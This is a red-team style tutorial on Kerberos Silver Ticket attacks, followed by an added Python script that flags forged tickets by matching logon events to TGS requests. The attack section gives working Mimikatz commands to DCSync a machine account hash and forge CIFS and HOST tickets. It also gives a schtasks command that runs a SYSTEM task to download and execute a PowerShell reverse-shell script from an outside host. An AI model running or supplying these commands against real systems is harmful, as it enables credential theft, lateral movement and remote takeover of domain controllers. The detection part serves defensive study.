Silver Ticket

A Silver Ticket is signed and encrypted with the target service account's hash. It represents a valid TGS (used for authorization).

Requirements:
• Domain SID
• Service account / machine account hash
• Domain name
• SIDs (in cross-forest attacks)

Extract the service (machine) account hash:

Invoke-Mimikatz -Command '"lsadump::dcsync /user:cyberwarfare\dc-01$"'

• Domain SID:

whoami /all (of a domain user)

The adversary forges a Silver Ticket in a domain as follows:

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:cyberwarfare.corp /sid:S-1-5-21-yyyyyyyy-zzzzzzzzzz-xxxxxx /target:enterprise-dc.cyberwarfare.corp /service:cifs /rc4:<HASH> /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

Command Execution using Silver Ticket

Adversaries create a Silver Ticket for the HOST service, which allows them to schedule a malicious task on the target:

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:cyberwarfare.corp /sid:S-1-5-21-xxxxxx-yyyy-zzzzz /target:enterprise-dc.cyberwarfare.corp /service:HOST /rc4:xxxxx /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

Schedule and execute a task on the remote server:

schtasks /create /S enterprise-dc.cyberwarfare.corp /SC Weekly /RU "NT Authority\SYSTEM" /TN "lateral" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://10.10.10.1:8000/InvokePowerShellTcp.ps1''')'"
schtasks /Run /S enterprise-dc.cyberwarfare.corp /TN "lateral"
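
Detection note: a forged service ticket is presented straight to the target and is never requested from a domain controller, so the server logs a Kerberos logon (event 4624) with no matching TGS request (event 4769) on any DC. The Python below is an added example, not code from the original page, that correlates the two. The event records are constructed, and their normalized field names are assumptions to be mapped from your own log schema.

```python
from datetime import datetime, timedelta

# Constructed, normalized events (not real logs). The field names are assumptions:
# map them from your SIEM's schema for event 4769 (on DCs) and 4624 (on the server).
TGS_REQUESTS_4769 = [
    {"time": "2024-05-01T08:55:00", "user": "alice@CYBERWARFARE.CORP",
     "service": "ENTERPRISE-DC$", "client_ip": "::ffff:10.10.20.15"},
]
KERBEROS_LOGONS_4624 = [
    {"time": "2024-05-01T09:00:00", "host": "ENTERPRISE-DC",
     "user": "alice", "client_ip": "10.10.20.15"},          # backed by the 4769 above
    {"time": "2024-05-01T09:30:00", "host": "ENTERPRISE-DC",
     "user": "Administrator", "client_ip": "10.10.20.44"},  # no 4769 at all
    {"time": "2024-05-02T20:00:00", "host": "ENTERPRISE-DC",
     "user": "alice", "client_ip": "10.10.20.15"},          # 4769 older than ticket lifetime
]
TICKET_LIFETIME = timedelta(minutes=600)  # 10 h, the value passed as /endin:600 above


def _norm_user(name):
    return name.split("@")[0].lower()           # 4769 logs user@REALM


def _norm_ip(ip):
    return ip.replace("::ffff:", "")            # 4769 logs IPv4-mapped IPv6 addresses


def logons_without_tgs(logons, tgs_requests, lifetime=TICKET_LIFETIME):
    """Return Kerberos logons that no KDC-issued service ticket can account for."""
    issued = {}
    for req in tgs_requests:
        key = (_norm_user(req["user"]), req["service"].rstrip("$").lower(),
               _norm_ip(req["client_ip"]))
        issued.setdefault(key, []).append(datetime.fromisoformat(req["time"]))
    unmatched = []
    for logon in logons:
        key = (_norm_user(logon["user"]), logon["host"].lower(), _norm_ip(logon["client_ip"]))
        when = datetime.fromisoformat(logon["time"])
        # A genuine ticket was requested from a DC at most one lifetime before use.
        if not any(timedelta(0) <= when - t <= lifetime for t in issued.get(key, [])):
            unmatched.append(logon)
    return unmatched


if __name__ == "__main__":
    for hit in logons_without_tgs(KERBEROS_LOGONS_4624, TGS_REQUESTS_4769):
        print("no matching 4769:", hit["time"], hit["user"], "from", hit["client_ip"])
```

The correlation is only as good as 4769 collection: a domain controller whose Security log is not forwarded shows up as unmatched logons. Ticket renewals (event 4770) are not modelled here.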
